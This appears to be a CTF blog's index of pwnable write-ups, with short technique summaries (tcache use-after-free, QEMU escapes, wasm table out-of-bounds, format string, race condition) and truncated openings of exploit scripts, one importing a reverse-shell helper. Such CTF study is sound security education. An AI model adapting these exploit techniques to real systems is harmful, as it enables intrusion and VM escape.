Category : pwnable Summary : wasm, bof, trigger function table index oob Exploit #!/usr/bin/python from pwn import * from paul45 import reverse_shell import requests as r URL = 'http://0:23333' def add_person(name, is_tutor): res = r.get(URL + '/add_person', params={'name':name, 'is_tutor':is_tutor}).text idx = int(res[len('create person done, person id = '..
View All
Category : pwnable CLV24893 SolvesPwn me, and Prove yourself nc clv2.pwn.seccon.jp 31337 Summary : tcache, use after free Exploit#!/usr/bin/python from pwn import * def cmd_register(name): ru('[E]xit\n') sl('R') ru('name?\n') sl(name) return rl(False).split(' ')[0] def cmd_login(name): ru('[E]xit\n') sl('L') ru('User : ') sl(name) def cmd_play(): ru('[E]xit\n') sl('P') def cmd_add_prov(method, w..
Category : pwnable Summary : qemu escape Exploit#include #include #include #include #include #include #include #include #include #define OOO_ALLOCATE 0x000000 #define OOO_FREE 0x100000 #define OOO_WRITE 0x200000 #define MAP_SIZE 0x1000000 #define OOO_BIN_BASE 0x1317940 #define FREE_GOT 0x11301a0 #define OOO_MAGIC_GADGET 0x6e65f9 int fd; char *mmio; uint64_t ooo_read(uint32_t idx, uint32_t offset..
Category : pwnable Summary : qemu escape Exploit #include #include #include #include #include #include #include #include #include #include #define IOMEM_A 0xfe900000 #define IOMEM_B 0xfea00000 #define IOPORT_A 0xc000 #define IOPORT_B 0xc100 #define MMIO_SRC 0x04 #define MMIO_DST 0x08 #define MMIO_COPY 0x20 #define MMIO_CMD 0x24 #define MMIO_TIMER 0x80 #define MMIO_EXPIRE_LO 0x88 #define MMIO_EXP..
Category : pwnable Summary : qemu escape Exploit #include #include #include #include #include #include #include #include #include #include #define SRC_LO 0x80 #define SRC_HI 0x84 #define DST_LO 0x88 #define DST_HI 0x8c #define CNT 0x90 #define TIMER 0x98 #define TIMER_READ 0x1 #define TIMER_WRITE 0x3 #define TIMER_ENC 0x4 #define MAP_SIZE 0x1000 #define PAGE_SHIFT 12 #define PAGE_SIZE (1 enc = s..
Category : pwnable Summary : uaf, tcache, show function, confusion between tcache and fastbin, 2 notes Exploit#!/usr/bin/python from pwn import * def cmd_add(data): ru('Your choice:') ss('1\x00') ru('Input the content:') ss(data) ru('Done!\n') def cmd_edit(idx, data): ru('Your choice:') ss('2\x00') ru('Input the idx:') ss(str(idx)+'\x00') ru('Input the content:') ss(data) ru('Done!\n') def cmd_d..
Category : pwnable secret_message 494 2 Solves Let's share a secret with us nc secret-message.pwn.seccon.jp 31337 (Hint: We allow a "little" bruteforcing to secret_message only.)Summary : ascii art, out of boundary, double staged format string attack, * precision, fread, fwrite Off by one 취약점으로 해겨해야 하는줄 알고 초반에 방향 잘못 잡았던 문제. fsb 로 취약점으로 풀이가능하다. 문제 description에서 "little" brute force를 허용해주는 것으로..
Category : pwnable Summary : race condition, heap overflow, no free, top chunk into fastbin Race condition 풀이 추가 예정 Exploit#!/usr/bin/python from pwn import * def cmd_add(times, **arg): ru('>> ') sl('1') ru('How many chunks at a time (1/2) ? ') sl(str(times)) if times == 2: # thread-1 ru('\nEnter Size 1: ') sl(str(arg['size'][0])) ru('\nEnter Author name : ') time.sleep(5) # thread-2 ru('\nEnter..